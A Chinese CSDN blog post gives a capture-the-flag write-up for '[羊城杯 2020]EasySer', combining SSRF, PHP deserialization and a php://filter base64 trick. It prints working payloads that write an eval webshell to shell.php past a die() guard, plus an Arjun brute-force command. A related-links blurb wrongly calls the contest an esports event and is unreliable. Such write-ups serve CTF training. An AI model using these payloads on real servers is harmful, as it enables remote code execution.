[羊城杯 2020]EasySer

最新推荐文章于 2024-05-04 09:42:59 发布
最新推荐文章于 2024-05-04 09:42:59 发布
阅读量601 收藏 5
点赞数 11
文章标签: web安全 ctf 笔记 题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/137158842
版权

[羊城杯 2020]EasySer

  • 进入页面,发现是ubuntu+apache2,但是好像没啥用

  • 尝试访问/robots.txt,得到
    image.png

  • 访问/star1.php/,查看源码,得到提示
    image.png

  • 一看就知道是ssrf,使用http://127.0.0.1/ser.php,得到源码
    image.png

源码

<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} 
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
        
    }
    public function hasaki(){
        $d   = '<?php die("nononon");?>';
        $a= $d. $this->text;
         @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}

?>

pop链子很简单:GWHT:__toString() => Yongen:hasaki()

绕过死亡die()

[[绕死亡exit()或die()]]
p神的文章谈一谈php://filter的妙用

使用编码和解码(base64)

首先利用的伪协议是php://filter/write=convert.base64-decode/resource=
将写入的内容进行base64解码后写入文件

知识点
而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。
base64算法解码时是4个byte一组

利用
由于<、?、()、;、>、\n、空格、"、'都不是base64编码的范围,
编码字符范围包括a-z A-Z 0-9 = /
直接拿<?php exit();?>举例
所以最终被解码的字符仅有“phpexit”和我们传入的其他字符
“phpexit”一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。
这样,"phpexita"被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是<?php exit; ?>没有了。

这时如果传入的是php://filter/write=convert.base64-decode/resource='a'.'PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4='   
注:base64_encode('<?php @eval($_POST["cmd"]);?>')PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=

则"phpexita"被正常解码,变为乱码,PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=解码后变为一句话木马

除了上面直接看,还可以直接用代码,打开文件查看,试几次就出来了

<?php
$filename = 'php://filter/write=convert.base64-decode/resource=shell.php';
$data = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTsgPz4=';
$add_str = '111';
$d = '<?php die("nononon");?>';
$data = $d . $add_str . $data;
file_put_contents($filename, $data);
  • phpdienononon:总共13个字符,所以需要加3个字符

Arjun

  • 接受序列化的参数在哪里呢,使用Arjun爆破,现在知道了ser.php源码,还有flag.php和star1.php不知道,爆破了flag.php啥都没有,爆破star1.php得到
使用工具Arjun进行参数爆破
命令:python3 arjun -u http://aac8b7e4-008f-486a-9642-232db8c62642.node4.buuoj.cn:81/ -c 100 -d 5
解释:-c :一次发送的参数数  -d:请求之间的延迟(秒),(默认值:0)  
如果不加-d 5可能就会429然后导致爆破不出来,当然,加上延时后速度自然慢的离谱
  • 得到第二个参数c

payload

<?php
class GWHT{
    public $hero;

}
class Yongen{
    //flag.php
    public $file='php://filter/write=convert.base64-decode/resource=shell.php';
    public $test='aaaPD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=';

}
$a=new GWHT();
$a->hero=new Yongen();
echo serialize($a);
//O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:59:"php://filter/write=convert.base64-decode/resource=shell.php";s:4:"text";s:43:"aaaPD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=";}}

paylod

/star1.php?path=http://127.0.0.1/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:59:"php://filter/write=convert.base64-decode/resource=shell.php";s:4:"text";s:43:"aaaPD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4=";}}
  • 链接AntSword,在根目录下面得到flag,对了flag.php是空的,什么都没有
    image.png
尘佑不尘
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
[羊城 2020]EasySer 1
shinygod的博客
03-31 822
知识点:Arjun爆参,file_put_contents伪协议过滤 目录审题分析绕过die的原理如何找传参的地方?__toString原理Arjun的安装和使用 审题 点开是个ubuntu版本的apache,没什么用,直接扫波目录。 扫到两个目录。 访问robots.txt 进入star1.php,提示我们要从家进入ser.php,且要是不安全的协议,那么就是http://127.0.0.1/ser.php <?php error_reporting(0); if ( $_SERVER['
[羊城 2020]easyser
m0_70819573的博客
04-13 115
需要绕过Yasuo,需要进行变量覆盖,接着利用file_put_contents危险函数写入shell,利用string.strip_tags去除php标签,将写入的shellbase64加密所以绕过string.strip_tags,在进行base64decode达到写入shell的目的。可构造本地ip127.0.0.1进行ssrf伪造,从而读取任意文件。2.用dirsearch扫到robots.txt。接着利用arjun爆出参数为c。转到star1.php。用蚁剑连接得到flag。
BUUCTF--[羊城 2020]EasySer
qq_46263951的博客
08-20 764
进入后是这样的页面,有点懵, 看下大佬的思路: 1) 源码写了不安全协议从本地,想到http 和127.0.0.1 2) 读源码看反序列化,写入shell 3) 伪协议base64绕过die(),rot13等等都可以 考点: 1) PHP 基础代码审计 2) SSRF本地文件读取 3) 反序列化写入webshell,绕过死亡绕过 使用文件扫描扫到robots.txt,提示访问/star1.php/ 查看页面的源代码可以看到提示 利用http://127.0.0.1/star1.php...
[羊城 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)
oZuoShen123的博客
10-08 766
F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! ! 意思就是http协议就能进ser.php,回顾一下http协议咋用的?……
NSS [羊城 2020]easyser
Jay17的博客
08-30 1711
NSS [羊城 2020]easyser
BUUCTF-[羊城]Easyser
m0_52358157的博客
06-11 893
BUU:[羊城 2020]EasySer –菜鸟的第一篇ctf题解 一开始拿到题目一面懵,于是常规的查看robots.txt,很幸运提示要你去访问/star1.php 进入到这个界面接着遇事不决f12得到提示使用一个不安全协议获取ser.php 然后开始了漫长的各种尝试:各种php伪协议,各种百度去搜寻不安全的协议,并没有什么结果。后来想到有一位师傅讲过http相对比于https是不安全的,因为它无状态,无连接,具有简单快速、灵活的特性,通信时候使用明文,也不会对通信方进行确认(重点在这!) 所以可以利
[羊城 2020]EasySer ---不会编程的崽
不会编程的崽的博客
04-24 539
也是很简单一个pop链,主要问题还是文件上传。而且这里没有给出参数,需要我们自己爆破。反正我是没爆破成功,不知道他们这么弄得,反序列化参数是c。1.需要绕过die,因为他会将那个php代码进行拼接,导致无法执行我们写的木马。我使用蚁剑连了之后,还用disable_function绕了一下(flag.php是假的)string.strip_tags:这个过滤器就比较有意思,用来处理掉读入的所有标签。2.为了防止我们自己的php代码被剔除,所以要进行base64编码。稍微带点反序列化,稍微。
[NSSCTF][羊城2020]WEB复现
cosmoslin的博客
03-13 5185
easycon 考点:一句话,base64转图片 访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接 里面有一个bbbbbbbbb.txt,打开发现是一串base64编码 发现是jpg头,base64转图片即可 easyphp 考点:.htaccess <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){
2020羊城CTF随缘Writeup
sash1mi
01-09 3384
2020羊城CTF随缘Writeup docker源码链接: https://github.com/k3vin-3/YCBCTF2020 Web部分 a_piece_of_java 考点:源码审计、java反序列化 PS:这道题没整明白,直接给出官方WP 第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接: DatabaseInfo databaseInfo = new DatabaseInfo(); databaseInfo.setHost("x.x.x.x"); datab
2020YCBCTF羊城官方Writeup.pdf
10-28
2020YCBCTF羊城官方Writeup.pdf
2023 羊城 final
11-21
附件
2023羊城 DASCTF EZ-Misc
09-03
2023羊城 DASCTF EZ-Misc
羊城快速通道
08-19
羊城快速通道
网络安全之密码学技术
缘友一世的博客
04-29 1452
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
web安全】-- 命令执行漏洞详解
m0_72286569的博客
04-30 923
命令执行漏洞是一种网络安全漏洞,它允许攻击者在受影响的系统上执行恶意命令。这种漏洞通常出现在软件应用程序或系统中,其典型示例是 Web 应用程序中的远程命令执行(RCE)漏洞。
网络安全思考题
weixin_62304542的博客
04-27 1490
网络安全渗透思考题
「 网络安全常用术语解读 」通用配置枚举CCE详解
最新发布
网络安全
05-04 776
CCE列表为安全相关的系统配置问题提供了唯一的标识符,以便通过促进多个信息源和工具之间配置数据的快速准确关联来改进工作流程。
羊城2020 wp
08-18
羊城2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围方面,羊城2020鼓励团队协作和竞争精神,这对于参赛选手来说是一个很好的机会展现自己的技术能力和团队合作能力。此外,组委会还积极倡导公平竞赛,严禁使用任何形式的作弊或不正当手段来获取胜利,从而保证了比赛的公正性。 羊城2020不仅是一场竞技比赛,还提供了丰厚的奖金和荣誉,吸引了众多顶尖选手参与其中。参赛选手们通过紧张刺激的比赛,展现了他们的技术实力和战术策略。同时,比赛也为电竞爱好者们提供了一个观赏比赛和学习经验的机会,让他们更好地了解电竞运动,提高自己的技术水平。 此外,羊城2020还注重了普及电竞文化的意义。比赛在各个媒体平台上进行直播,使更多的观众能够通过网络或电视观看比赛,增加了电竞的曝光度。通过各种推广活动,羊城2020吸引了更多非电竞爱好者的关注,提高了电竞在社会中的认可度和影响力。 总的来说,羊城2020是一场令人期待的电竞盛事,它不仅展示了顶尖选手们的实力和技巧,也推广了电竞文化并吸引了更多人的关注。这样的比赛将继续推动电竞行业的发展和壮大,为电竞爱好者们带来更多的精彩赛事和娱乐体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值